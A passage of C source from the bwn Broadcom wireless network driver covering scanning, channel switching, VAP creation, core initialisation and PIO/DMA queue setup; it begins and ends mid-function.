BWN_LOCK(sc); mac = sc->sc_curmac; if (mac != NULL && mac->mac_status >= BWN_MAC_STATUS_INITED) { sc->sc_filters |= BWN_MACCTL_BEACON_PROMISC; bwn_set_opmode(mac); /* disable CFP update during scan */ bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_SKIP_CFP_UPDATE); } BWN_UNLOCK(sc); } static void bwn_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac; BWN_LOCK(sc); mac = sc->sc_curmac; if (mac != NULL && mac->mac_status >= BWN_MAC_STATUS_INITED) { sc->sc_filters &= ~BWN_MACCTL_BEACON_PROMISC; bwn_set_opmode(mac); bwn_hf_write(mac, bwn_hf_read(mac) & ~BWN_HF_SKIP_CFP_UPDATE); } BWN_UNLOCK(sc); } static void bwn_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac = sc->sc_curmac; struct bwn_phy *phy = &mac->mac_phy; int chan, error; BWN_LOCK(sc); error = bwn_switch_band(sc, ic->ic_curchan); if (error) goto fail; bwn_mac_suspend(mac); bwn_set_txretry(mac, BWN_RETRY_SHORT, BWN_RETRY_LONG); chan = ieee80211_chan2ieee(ic, ic->ic_curchan); if (chan != phy->chan) bwn_switch_channel(mac, chan); /* TX power level */ if (ic->ic_curchan->ic_maxpower != 0 && ic->ic_curchan->ic_maxpower != phy->txpower) { phy->txpower = ic->ic_curchan->ic_maxpower / 2; bwn_phy_txpower_check(mac, BWN_TXPWR_IGNORE_TIME | BWN_TXPWR_IGNORE_TSSI); } bwn_set_txantenna(mac, BWN_ANT_DEFAULT); if (phy->set_antenna) phy->set_antenna(mac, BWN_ANT_DEFAULT); if (sc->sc_rf_enabled != phy->rf_on) { if (sc->sc_rf_enabled) { bwn_rf_turnon(mac); if (!(mac->mac_flags & BWN_MAC_FLAG_RADIO_ON)) device_printf(sc->sc_dev, "please turn on the RF switch\n"); } else bwn_rf_turnoff(mac); } bwn_mac_enable(mac); fail: /* * Setup radio tap channel freq and flags */ sc->sc_tx_th.wt_chan_freq = sc->sc_rx_th.wr_chan_freq = htole16(ic->ic_curchan->ic_freq); sc->sc_tx_th.wt_chan_flags = sc->sc_rx_th.wr_chan_flags = htole16(ic->ic_curchan->ic_flags & 0xffff); BWN_UNLOCK(sc); } static struct ieee80211vap * bwn_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac0[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct bwn_softc *sc = ifp->if_softc; struct ieee80211vap *vap; struct bwn_vap *bvp; uint8_t mac[IEEE80211_ADDR_LEN]; IEEE80211_ADDR_COPY(mac, mac0); switch (opmode) { case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: case IEEE80211_M_STA: case IEEE80211_M_WDS: case IEEE80211_M_MONITOR: case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: break; default: return (NULL); } IEEE80211_ADDR_COPY(sc->sc_macaddr, mac0); bvp = (struct bwn_vap *) malloc(sizeof(struct bwn_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (bvp == NULL) { device_printf(sc->sc_dev, "failed to allocate a buffer\n"); return (NULL); } vap = &bvp->bv_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); IEEE80211_ADDR_COPY(vap->iv_myaddr, mac); /* override with driver methods */ bvp->bv_newstate = vap->iv_newstate; vap->iv_newstate = bwn_newstate; /* override max aid so sta's cannot assoc when we're out of sta id's */ vap->iv_max_aid = BWN_STAID_MAX; ieee80211_ratectl_init(vap); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); return (vap); } static void bwn_vap_delete(struct ieee80211vap *vap) { struct bwn_vap *bvp = BWN_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(bvp, M_80211_VAP); } static void bwn_init(void *arg) { struct bwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int error = 0; DPRINTF(sc, BWN_DEBUG_ANY, "%s: if_flags 0x%x\n", __func__, ifp->if_flags); BWN_LOCK(sc); error = bwn_init_locked(sc); BWN_UNLOCK(sc); if (error == 0) ieee80211_start_all(ic); /* start all vap's */ } static int bwn_init_locked(struct bwn_softc *sc) { struct bwn_mac *mac; struct ifnet *ifp = sc->sc_ifp; int error; BWN_ASSERT_LOCKED(sc); bzero(sc->sc_bssid, IEEE80211_ADDR_LEN); sc->sc_flags |= BWN_FLAG_NEED_BEACON_TP; sc->sc_filters = 0; bwn_wme_clear(sc); sc->sc_beacons[0] = sc->sc_beacons[1] = 0; sc->sc_rf_enabled = 1; mac = sc->sc_curmac; if (mac->mac_status == BWN_MAC_STATUS_UNINIT) { error = bwn_core_init(mac); if (error != 0) return (error); } if (mac->mac_status == BWN_MAC_STATUS_INITED) bwn_core_start(mac); bwn_set_opmode(mac); bwn_set_pretbtt(mac); bwn_spu_setdelay(mac, 0); bwn_set_macaddr(mac); ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->sc_rfswitch_ch, hz, bwn_rfswitch, sc); callout_reset(&sc->sc_watchdog_ch, hz, bwn_watchdog, sc); return (0); } static void bwn_stop(struct bwn_softc *sc, int statechg) { BWN_LOCK(sc); bwn_stop_locked(sc, statechg); BWN_UNLOCK(sc); } static void bwn_stop_locked(struct bwn_softc *sc, int statechg) { struct bwn_mac *mac = sc->sc_curmac; struct ifnet *ifp = sc->sc_ifp; BWN_ASSERT_LOCKED(sc); if (mac->mac_status >= BWN_MAC_STATUS_INITED) { /* XXX FIXME opmode not based on VAP */ bwn_set_opmode(mac); bwn_set_macaddr(mac); } if (mac->mac_status >= BWN_MAC_STATUS_STARTED) bwn_core_stop(mac); callout_stop(&sc->sc_led_blink_ch); sc->sc_led_blinking = 0; bwn_core_exit(mac); sc->sc_rf_enabled = 0; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); } static void bwn_wme_clear(struct bwn_softc *sc) { #define MS(_v, _f) (((_v) & _f) >> _f##_S) struct wmeParams *p; unsigned int i; KASSERT(N(bwn_wme_shm_offsets) == N(sc->sc_wmeParams), ("%s:%d: fail", __func__, __LINE__)); for (i = 0; i < N(sc->sc_wmeParams); i++) { p = &(sc->sc_wmeParams[i]); switch (bwn_wme_shm_offsets[i]) { case BWN_WME_VOICE: p->wmep_txopLimit = 0; p->wmep_aifsn = 2; /* XXX FIXME: log2(cwmin) */ p->wmep_logcwmin = MS(0x0001, WME_PARAM_LOGCWMIN); p->wmep_logcwmax = MS(0x0001, WME_PARAM_LOGCWMAX); break; case BWN_WME_VIDEO: p->wmep_txopLimit = 0; p->wmep_aifsn = 2; /* XXX FIXME: log2(cwmin) */ p->wmep_logcwmin = MS(0x0001, WME_PARAM_LOGCWMIN); p->wmep_logcwmax = MS(0x0001, WME_PARAM_LOGCWMAX); break; case BWN_WME_BESTEFFORT: p->wmep_txopLimit = 0; p->wmep_aifsn = 3; /* XXX FIXME: log2(cwmin) */ p->wmep_logcwmin = MS(0x0001, WME_PARAM_LOGCWMIN); p->wmep_logcwmax = MS(0x03ff, WME_PARAM_LOGCWMAX); break; case BWN_WME_BACKGROUND: p->wmep_txopLimit = 0; p->wmep_aifsn = 7; /* XXX FIXME: log2(cwmin) */ p->wmep_logcwmin = MS(0x0001, WME_PARAM_LOGCWMIN); p->wmep_logcwmax = MS(0x03ff, WME_PARAM_LOGCWMAX); break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } } } static int bwn_core_init(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint64_t hf; int error; KASSERT(mac->mac_status == BWN_MAC_STATUS_UNINIT, ("%s:%d: fail", __func__, __LINE__)); siba_powerup(sc->sc_dev, 0); if (!siba_dev_isup(sc->sc_dev)) bwn_reset_core(mac, mac->mac_phy.gmode ? BWN_TGSLOW_SUPPORT_G : 0); mac->mac_flags &= ~BWN_MAC_FLAG_DFQVALID; mac->mac_flags |= BWN_MAC_FLAG_RADIO_ON; mac->mac_phy.hwpctl = (bwn_hwpctl) ? 1 : 0; BWN_GETTIME(mac->mac_phy.nexttime); mac->mac_phy.txerrors = BWN_TXERROR_MAX; bzero(&mac->mac_stats, sizeof(mac->mac_stats)); mac->mac_stats.link_noise = -95; mac->mac_reason_intr = 0; bzero(mac->mac_reason, sizeof(mac->mac_reason)); mac->mac_intr_mask = BWN_INTR_MASKTEMPLATE; #ifdef BWN_DEBUG if (sc->sc_debug & BWN_DEBUG_XMIT) mac->mac_intr_mask &= ~BWN_INTR_PHY_TXERR; #endif mac->mac_suspended = 1; mac->mac_task_state = 0; memset(&mac->mac_noise, 0, sizeof(mac->mac_noise)); mac->mac_phy.init_pre(mac); siba_pcicore_intr(sc->sc_dev); siba_fix_imcfglobug(sc->sc_dev); bwn_bt_disable(mac); if (mac->mac_phy.prepare_hw) { error = mac->mac_phy.prepare_hw(mac); if (error) goto fail0; } error = bwn_chip_init(mac); if (error) goto fail0; bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_COREREV, siba_get_revid(sc->sc_dev)); hf = bwn_hf_read(mac); if (mac->mac_phy.type == BWN_PHYTYPE_G) { hf |= BWN_HF_GPHY_SYM_WORKAROUND; if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_PACTRL) hf |= BWN_HF_PAGAINBOOST_OFDM_ON; if (mac->mac_phy.rev == 1) hf |= BWN_HF_GPHY_DC_CANCELFILTER; } if (mac->mac_phy.rf_ver == 0x2050) { if (mac->mac_phy.rf_rev < 6) hf |= BWN_HF_FORCE_VCO_RECALC; if (mac->mac_phy.rf_rev == 6) hf |= BWN_HF_4318_TSSI; } if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_CRYSTAL_NOSLOW) hf |= BWN_HF_SLOWCLOCK_REQ_OFF; if ((siba_get_type(sc->sc_dev) == SIBA_TYPE_PCI) && (siba_get_pcicore_revid(sc->sc_dev) <= 10)) hf |= BWN_HF_PCI_SLOWCLOCK_WORKAROUND; hf &= ~BWN_HF_SKIP_CFP_UPDATE; bwn_hf_write(mac, hf); bwn_set_txretry(mac, BWN_RETRY_SHORT, BWN_RETRY_LONG); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_SHORT_RETRY_FALLBACK, 3); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_LONG_RETRY_FALLBACK, 2); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_PROBE_RESP_MAXTIME, 1); bwn_rate_init(mac); bwn_set_phytxctl(mac); bwn_shm_write_2(mac, BWN_SCRATCH, BWN_SCRATCH_CONT_MIN, (mac->mac_phy.type == BWN_PHYTYPE_B) ? 0x1f : 0xf); bwn_shm_write_2(mac, BWN_SCRATCH, BWN_SCRATCH_CONT_MAX, 0x3ff); if (siba_get_type(sc->sc_dev) == SIBA_TYPE_PCMCIA || bwn_usedma == 0) bwn_pio_init(mac); else bwn_dma_init(mac); bwn_wme_init(mac); bwn_spu_setdelay(mac, 1); bwn_bt_enable(mac); siba_powerup(sc->sc_dev, !(siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_CRYSTAL_NOSLOW)); bwn_set_macaddr(mac); bwn_crypt_init(mac); /* XXX LED initializatin */ mac->mac_status = BWN_MAC_STATUS_INITED; return (error); fail0: siba_powerdown(sc->sc_dev); KASSERT(mac->mac_status == BWN_MAC_STATUS_UNINIT, ("%s:%d: fail", __func__, __LINE__)); return (error); } static void bwn_core_start(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint32_t tmp; KASSERT(mac->mac_status == BWN_MAC_STATUS_INITED, ("%s:%d: fail", __func__, __LINE__)); if (siba_get_revid(sc->sc_dev) < 5) return; while (1) { tmp = BWN_READ_4(mac, BWN_XMITSTAT_0); if (!(tmp & 0x00000001)) break; tmp = BWN_READ_4(mac, BWN_XMITSTAT_1); } bwn_mac_enable(mac); BWN_WRITE_4(mac, BWN_INTR_MASK, mac->mac_intr_mask); callout_reset(&sc->sc_task_ch, hz * 15, bwn_tasks, mac); mac->mac_status = BWN_MAC_STATUS_STARTED; } static void bwn_core_exit(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint32_t macctl; BWN_ASSERT_LOCKED(mac->mac_sc); KASSERT(mac->mac_status <= BWN_MAC_STATUS_INITED, ("%s:%d: fail", __func__, __LINE__)); if (mac->mac_status != BWN_MAC_STATUS_INITED) return; mac->mac_status = BWN_MAC_STATUS_UNINIT; macctl = BWN_READ_4(mac, BWN_MACCTL); macctl &= ~BWN_MACCTL_MCODE_RUN; macctl |= BWN_MACCTL_MCODE_JMP0; BWN_WRITE_4(mac, BWN_MACCTL, macctl); bwn_dma_stop(mac); bwn_pio_stop(mac); bwn_chip_exit(mac); mac->mac_phy.switch_analog(mac, 0); siba_dev_down(sc->sc_dev, 0); siba_powerdown(sc->sc_dev); } static void bwn_bt_disable(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; (void)sc; /* XXX do nothing yet */ } static int bwn_chip_init(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct bwn_phy *phy = &mac->mac_phy; uint32_t macctl; int error; macctl = BWN_MACCTL_IHR_ON | BWN_MACCTL_SHM_ON | BWN_MACCTL_STA; if (phy->gmode) macctl |= BWN_MACCTL_GMODE; BWN_WRITE_4(mac, BWN_MACCTL, macctl); error = bwn_fw_fillinfo(mac); if (error) return (error); error = bwn_fw_loaducode(mac); if (error) return (error); error = bwn_gpio_init(mac); if (error) return (error); error = bwn_fw_loadinitvals(mac); if (error) { siba_gpio_set(sc->sc_dev, 0); return (error); } phy->switch_analog(mac, 1); error = bwn_phy_init(mac); if (error) { siba_gpio_set(sc->sc_dev, 0); return (error); } if (phy->set_im) phy->set_im(mac, BWN_IMMODE_NONE); if (phy->set_antenna) phy->set_antenna(mac, BWN_ANT_DEFAULT); bwn_set_txantenna(mac, BWN_ANT_DEFAULT); if (phy->type == BWN_PHYTYPE_B) BWN_WRITE_2(mac, 0x005e, BWN_READ_2(mac, 0x005e) | 0x0004); BWN_WRITE_4(mac, 0x0100, 0x01000000); if (siba_get_revid(sc->sc_dev) < 5) BWN_WRITE_4(mac, 0x010c, 0x01000000); BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_STA); BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) | BWN_MACCTL_STA); bwn_shm_write_2(mac, BWN_SHARED, 0x0074, 0x0000); bwn_set_opmode(mac); if (siba_get_revid(sc->sc_dev) < 3) { BWN_WRITE_2(mac, 0x060e, 0x0000); BWN_WRITE_2(mac, 0x0610, 0x8000); BWN_WRITE_2(mac, 0x0604, 0x0000); BWN_WRITE_2(mac, 0x0606, 0x0200); } else { BWN_WRITE_4(mac, 0x0188, 0x80000000); BWN_WRITE_4(mac, 0x018c, 0x02000000); } BWN_WRITE_4(mac, BWN_INTR_REASON, 0x00004000); BWN_WRITE_4(mac, BWN_DMA0_INTR_MASK, 0x0001dc00); BWN_WRITE_4(mac, BWN_DMA1_INTR_MASK, 0x0000dc00); BWN_WRITE_4(mac, BWN_DMA2_INTR_MASK, 0x0000dc00); BWN_WRITE_4(mac, BWN_DMA3_INTR_MASK, 0x0001dc00); BWN_WRITE_4(mac, BWN_DMA4_INTR_MASK, 0x0000dc00); BWN_WRITE_4(mac, BWN_DMA5_INTR_MASK, 0x0000dc00); siba_write_4(sc->sc_dev, SIBA_TGSLOW, siba_read_4(sc->sc_dev, SIBA_TGSLOW) | 0x00100000); BWN_WRITE_2(mac, BWN_POWERUP_DELAY, siba_get_cc_powerdelay(sc->sc_dev)); return (error); } /* read hostflags */ static uint64_t bwn_hf_read(struct bwn_mac *mac) { uint64_t ret; ret = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_HFHI); ret <<= 16; ret |= bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_HFMI); ret <<= 16; ret |= bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_HFLO); return (ret); } static void bwn_hf_write(struct bwn_mac *mac, uint64_t value) { bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_HFLO, (value & 0x00000000ffffull)); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_HFMI, (value & 0x0000ffff0000ull) >> 16); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_HFHI, (value & 0xffff00000000ULL) >> 32); } static void bwn_set_txretry(struct bwn_mac *mac, int s, int l) { bwn_shm_write_2(mac, BWN_SCRATCH, BWN_SCRATCH_SHORT_RETRY, MIN(s, 0xf)); bwn_shm_write_2(mac, BWN_SCRATCH, BWN_SCRATCH_LONG_RETRY, MIN(l, 0xf)); } static void bwn_rate_init(struct bwn_mac *mac) { switch (mac->mac_phy.type) { case BWN_PHYTYPE_A: case BWN_PHYTYPE_G: case BWN_PHYTYPE_LP: case BWN_PHYTYPE_N: bwn_rate_write(mac, BWN_OFDM_RATE_6MB, 1); bwn_rate_write(mac, BWN_OFDM_RATE_12MB, 1); bwn_rate_write(mac, BWN_OFDM_RATE_18MB, 1); bwn_rate_write(mac, BWN_OFDM_RATE_24MB, 1); bwn_rate_write(mac, BWN_OFDM_RATE_36MB, 1); bwn_rate_write(mac, BWN_OFDM_RATE_48MB, 1); bwn_rate_write(mac, BWN_OFDM_RATE_54MB, 1); if (mac->mac_phy.type == BWN_PHYTYPE_A) break; /* FALLTHROUGH */ case BWN_PHYTYPE_B: bwn_rate_write(mac, BWN_CCK_RATE_1MB, 0); bwn_rate_write(mac, BWN_CCK_RATE_2MB, 0); bwn_rate_write(mac, BWN_CCK_RATE_5MB, 0); bwn_rate_write(mac, BWN_CCK_RATE_11MB, 0); break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } } static void bwn_rate_write(struct bwn_mac *mac, uint16_t rate, int ofdm) { uint16_t offset; if (ofdm) { offset = 0x480; offset += (bwn_plcp_getofdm(rate) & 0x000f) * 2; } else { offset = 0x4c0; offset += (bwn_plcp_getcck(rate) & 0x000f) * 2; } bwn_shm_write_2(mac, BWN_SHARED, offset + 0x20, bwn_shm_read_2(mac, BWN_SHARED, offset)); } static uint8_t bwn_plcp_getcck(const uint8_t bitrate) { switch (bitrate) { case BWN_CCK_RATE_1MB: return (0x0a); case BWN_CCK_RATE_2MB: return (0x14); case BWN_CCK_RATE_5MB: return (0x37); case BWN_CCK_RATE_11MB: return (0x6e); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (0); } static uint8_t bwn_plcp_getofdm(const uint8_t bitrate) { switch (bitrate) { case BWN_OFDM_RATE_6MB: return (0xb); case BWN_OFDM_RATE_9MB: return (0xf); case BWN_OFDM_RATE_12MB: return (0xa); case BWN_OFDM_RATE_18MB: return (0xe); case BWN_OFDM_RATE_24MB: return (0x9); case BWN_OFDM_RATE_36MB: return (0xd); case BWN_OFDM_RATE_48MB: return (0x8); case BWN_OFDM_RATE_54MB: return (0xc); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (0); } static void bwn_set_phytxctl(struct bwn_mac *mac) { uint16_t ctl; ctl = (BWN_TX_PHY_ENC_CCK | BWN_TX_PHY_ANT01AUTO | BWN_TX_PHY_TXPWR); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_BEACON_PHYCTL, ctl); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_ACKCTS_PHYCTL, ctl); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_PROBE_RESP_PHYCTL, ctl); } static void bwn_pio_init(struct bwn_mac *mac) { struct bwn_pio *pio = &mac->mac_method.pio; BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_BIGENDIAN); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_RX_PADOFFSET, 0); bwn_pio_set_txqueue(mac, &pio->wme[WME_AC_BK], 0); bwn_pio_set_txqueue(mac, &pio->wme[WME_AC_BE], 1); bwn_pio_set_txqueue(mac, &pio->wme[WME_AC_VI], 2); bwn_pio_set_txqueue(mac, &pio->wme[WME_AC_VO], 3); bwn_pio_set_txqueue(mac, &pio->mcast, 4); bwn_pio_setupqueue_rx(mac, &pio->rx, 0); } static void bwn_pio_set_txqueue(struct bwn_mac *mac, struct bwn_pio_txqueue *tq, int index) { struct bwn_pio_txpkt *tp; struct bwn_softc *sc = mac->mac_sc; unsigned int i; tq->tq_base = bwn_pio_idx2base(mac, index) + BWN_PIO_TXQOFFSET(mac); tq->tq_index = index; tq->tq_free = BWN_PIO_MAX_TXPACKETS; if (siba_get_revid(sc->sc_dev) >= 8) tq->tq_size = 1920; else { tq->tq_size = bwn_pio_read_2(mac, tq, BWN_PIO_TXQBUFSIZE); tq->tq_size -= 80; } TAILQ_INIT(&tq->tq_pktlist); for (i = 0; i < N(tq->tq_pkts); i++) { tp = &(tq->tq_pkts[i]); tp->tp_index = i; tp->tp_queue = tq; TAILQ_INSERT_TAIL(&tq->tq_pktlist, tp, tp_list); } } static uint16_t bwn_pio_idx2base(struct bwn_mac *mac, int index) { struct bwn_softc *sc = mac->mac_sc; static const uint16_t bases[] = { BWN_PIO_BASE0, BWN_PIO_BASE1, BWN_PIO_BASE2, BWN_PIO_BASE3, BWN_PIO_BASE4, BWN_PIO_BASE5, BWN_PIO_BASE6, BWN_PIO_BASE7, }; static const uint16_t bases_rev11[] = { BWN_PIO11_BASE0, BWN_PIO11_BASE1, BWN_PIO11_BASE2, BWN_PIO11_BASE3, BWN_PIO11_BASE4, BWN_PIO11_BASE5, }; if (siba_get_revid(sc->sc_dev) >= 11) { if (index >= N(bases_rev11)) device_printf(sc->sc_dev, "%s: warning\n", __func__); return (bases_rev11[index]); } if (index >= N(bases)) device_printf(sc->sc_dev, "%s: warning\n", __func__); return (bases[index]); } static void bwn_pio_setupqueue_rx(struct bwn_mac *mac, struct bwn_pio_rxqueue *prq, int index) { struct bwn_softc *sc = mac->mac_sc; prq->prq_mac = mac; prq->prq_rev = siba_get_revid(sc->sc_dev); prq->prq_base = bwn_pio_idx2base(mac, index) + BWN_PIO_RXQOFFSET(mac); bwn_dma_rxdirectfifo(mac, index, 1); } static void bwn_destroy_pioqueue_tx(struct bwn_pio_txqueue *tq) { if (tq == NULL) return; bwn_pio_cancel_tx_packets(tq); } static void bwn_destroy_queue_tx(struct bwn_pio_txqueue *pio) { bwn_destroy_pioqueue_tx(pio); } static uint16_t bwn_pio_read_2(struct bwn_mac *mac, struct bwn_pio_txqueue *tq, uint16_t offset) { return (BWN_READ_2(mac, tq->tq_base + offset)); } static void bwn_dma_rxdirectfifo(struct bwn_mac *mac, int idx, uint8_t enable) { uint32_t ctl; int type; uint16_t base; type = bwn_dma_mask2type(bwn_dma_mask(mac)); base = bwn_dma_base(type, idx); if (type == BWN_DMA_64BIT) { ctl = BWN_READ_4(mac, base + BWN_DMA64_RXCTL); ctl &= ~BWN_DMA64_RXDIRECTFIFO; if (enable) ctl |= BWN_DMA64_RXDIRECTFIFO; BWN_WRITE_4(mac, base + BWN_DMA64_RXCTL, ctl); } else { ctl = BWN_READ_4(mac, base + BWN_DMA32_RXCTL); ctl &= ~BWN_DMA32_RXDIRECTFIFO; if (enable) ctl |= BWN_DMA32_RXDIRECTFIFO; BWN_WRITE_4(mac, base + BWN_DMA32_RXCTL, ctl); } } static uint64_t bwn_dma_mask(struct bwn_mac *mac) { uint32_t tmp; uint16_t base; tmp = BWN_READ_4(mac, SIBA_TGSHIGH); if (tmp & SIBA_TGSHIGH_DMA64) return (BWN_DMA_BIT_MASK(64)); base = bwn_dma_base(0, 0); BWN_WRITE_4(mac, base + BWN_DMA32_TXCTL, BWN_DMA32_TXADDREXT_MASK); tmp = BWN_READ_4(mac, base + BWN_DMA32_TXCTL); if (tmp & BWN_DMA32_TXADDREXT_MASK) return (BWN_DMA_BIT_MASK(32)); return (BWN_DMA_BIT_MASK(30)); } static int bwn_dma_mask2type(uint64_t dmamask) { if (dmamask == BWN_DMA_BIT_MASK(30)) return (BWN_DMA_30BIT); if (dmamask == BWN_DMA_BIT_MASK(32)) return (BWN_DMA_32BIT); if (dmamask == BWN_DMA_BIT_MASK(64)) return (BWN_DMA_64BIT); KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (BWN_DMA_30BIT); } static void bwn_pio_cancel_tx_packets(struct bwn_pio_txqueue *tq) { struct bwn_pio_txpkt *tp; unsigned int i; for (i = 0; i < N(tq->tq_pkts); i++) { tp = &(tq->tq_pkts[i]); if (tp->tp_m) { m_freem(tp->tp_m); tp->tp_m = NULL; } } } static uint16_t bwn_dma_base(int type, int controller_idx) { static const uint16_t map64[] = { BWN_DMA64_BASE0, BWN_DMA64_BASE1, BWN_DMA64_BASE2, BWN_DMA64_BASE3, BWN_DMA64_BASE4, BWN_DMA64_BASE5, }; static const uint16_t map32[] = { BWN_DMA32_BASE0, BWN_DMA32_BASE1, BWN_DMA32_BASE2, BWN_DMA32_BASE3, BWN_DMA32_BASE4, BWN_DMA32_BASE5, }; if (type == BWN_DMA_64BIT) { KASSERT(controller_idx >= 0 && controller_idx < N(map64), ("%s:%d: fail", __func__, __LINE__)); return (map64[controller_idx]); } KASSERT(controller_idx >= 0 && controller_idx < N(map32), ("%s:%d: fail", __func__, __LINE__)); return (map32[controller_idx]); } static void bwn_dma_init(struct bwn_mac *mac) { struct bwn_dma *dma = &mac->mac_method.dma; /* setup TX DMA channels. */ bwn_dma_setup(dma->wme[WME_AC_BK]); bwn_dma_setup(dma->wme[WME_AC_BE]); bwn_dma_setup(dma->wme[WME_AC_VI]); bwn_dma_setup(dma->wme[WME_AC_VO]); bwn_dma_setup(dma->mcast); /* setup RX DMA channel. */ bwn_dma_setup(dma->rx); } static struct bwn_dma_ring * bwn_dma_ringsetup(struct bwn_mac *mac, int controller_index, int for_tx, int type) { struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_dma_ring *dr; struct bwn_dmadesc_generic *desc; struct bwn_dmadesc_meta *mt; struct bwn_softc *sc = mac->mac_sc; int error, i; dr = malloc(sizeof(*dr), M_DEVBUF, M_NOWAIT | M_ZERO); if (dr == NULL) goto out; dr->dr_numslots = BWN_RXRING_SLOTS; if (for_tx) dr->dr_numslots = BWN_TXRING_SLOTS; dr->dr_meta = malloc(dr->dr_numslots * sizeof(struct bwn_dmadesc_meta), M_DEVBUF, M_NOWAIT | M_ZERO); if (dr->dr_meta == NULL) goto fail0; dr->dr_type = type; dr->dr_mac = mac; dr->dr_base = bwn_dma_base(type, controller_index); dr->dr_index = controller_index; if (type == BWN_DMA_64BIT) { dr->getdesc = bwn_dma_64_getdesc; dr->setdesc = bwn_dma_64_setdesc; dr->start_transfer = bwn_dma_64_start_transfer; dr->suspend = bwn_dma_64_suspend; dr->resume = bwn_dma_64_resume; dr->get_curslot = bwn_dma_64_get_curslot; dr->set_curslot = bwn_dma_64_set_curslot; } else { dr->getdesc = bwn_dma_32_getdesc; dr->setdesc = bwn_dma_32_setdesc; dr->start_transfer = bwn_dma_32_start_transfer; dr->suspend = bwn_dma_32_suspend; dr->resume = bwn_dma_32_resume; dr->get_curslot = bwn_dma_32_get_curslot; dr->set_curslot = bwn_dma_32_set_curslot; } if (for_tx) { dr->dr_tx = 1; dr->dr_curslot = -1; } else { if (dr->dr_index == 0) { dr->dr_rx_bufsize = BWN_DMA0_RX_BUFFERSIZE; dr->dr_frameoffset = BWN_DMA0_RX_FRAMEOFFSET; } else KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } error = bwn_dma_allocringmemory(dr); if (error) goto fail2; if (for_tx) { /* * Assumption: BWN_TXRING_SLOTS can be divided by * BWN_TX_SLOTS_PER_FRAME */ KASSERT(BWN_TXRING_SLOTS % BWN_TX_SLOTS_PER_FRAME == 0, ("%s:%d: fail", __func__, __LINE__)); dr->dr_txhdr_cache = malloc((dr->dr_numslots / BWN_TX_SLOTS_PER_FRAME) * BWN_HDRSIZE(mac), M_DEVBUF, M_NOWAIT | M_ZERO); KASSERT(dr->dr_txhdr_cache != NULL, ("%s:%d: fail", __func__, __LINE__)); /* * Create TX ring DMA stuffs */ error = bus_dma_tag_create(dma->parent_dtag, BWN_ALIGN, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, BWN_HDRSIZE(mac), 1, BUS_SPACE_MAXSIZE_32BIT, 0, NULL, NULL, &dr->dr_txring_dtag); if (error) { device_printf(sc->sc_dev, "can't create TX ring DMA tag: TODO frees\n"); goto fail1; } for (i = 0; i < dr->dr_numslots; i += 2) { dr->getdesc(dr, i, &desc, &mt); mt->mt_txtype = BWN_DMADESC_METATYPE_HEADER; mt->mt_m = NULL; mt->mt_ni = NULL; mt->mt_islast = 0; error = bus_dmamap_create(dr->dr_txring_dtag, 0, &mt->mt_dmap); if (error) { device_printf(sc->sc_dev, "can't create RX buf DMA map\n"); goto fail1; } dr->getdesc(dr, i + 1, &desc, &mt); mt->mt_txtype = BWN_DMADESC_METATYPE_BODY; mt->mt_m = NULL; mt->mt_ni = NULL; mt->mt_islast = 1; error = bus_dmamap_create(dma->txbuf_dtag, 0, &mt->mt_dmap); if (error) { device_printf(sc->sc_dev, "can't create RX buf DMA map\n"); goto fail1; } } } else { error = 